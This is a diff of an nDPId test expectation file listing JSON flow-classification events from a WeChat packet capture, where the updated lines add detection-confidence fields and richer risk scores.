-00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00614{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1492167916810,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00625{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167849769,"flow_last_seen":1492167851204,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492167916810,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492167916810,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795095,"flow_last_seen":1492167795102,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01428{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00640{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851203,"flow_last_seen":1492167851203,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1492167916810,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff86:6c5b","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00651{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167849769,"flow_last_seen":1492167851204,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492167916810,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492167916810,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795095,"flow_last_seen":1492167795102,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167641988,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795088,"flow_last_seen":1492167795100,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167449288,"flow_last_seen":1492167820408,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1492167440984,"flow_last_seen":1492167822531,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167440370,"flow_last_seen":1492167815567,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795087,"flow_last_seen":1492167795096,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492167795292,"flow_last_seen":1492167796728,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167848542,"flow_last_seen":1492167848542,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795092,"flow_last_seen":1492167795103,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
-00651{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1492167776953,"flow_last_seen":1492167815112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":25818,"flow_avg_l4_payload_len":437,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795088,"flow_last_seen":1492167795100,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167449288,"flow_last_seen":1492167820408,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1492167440984,"flow_last_seen":1492167822531,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492167440370,"flow_last_seen":1492167815567,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795087,"flow_last_seen":1492167795096,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492167795292,"flow_last_seen":1492167796728,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167848542,"flow_last_seen":1492167848542,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795092,"flow_last_seen":1492167795103,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1492167776953,"flow_last_seen":1492167815112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":25818,"flow_avg_l4_payload_len":437,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1492167865975,"flow_last_seen":1492167896999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":21218,"flow_avg_l4_payload_len":433,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167866226,"flow_last_seen":1492167897002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1492167905310,"flow_last_seen":1492167916848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":8052,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
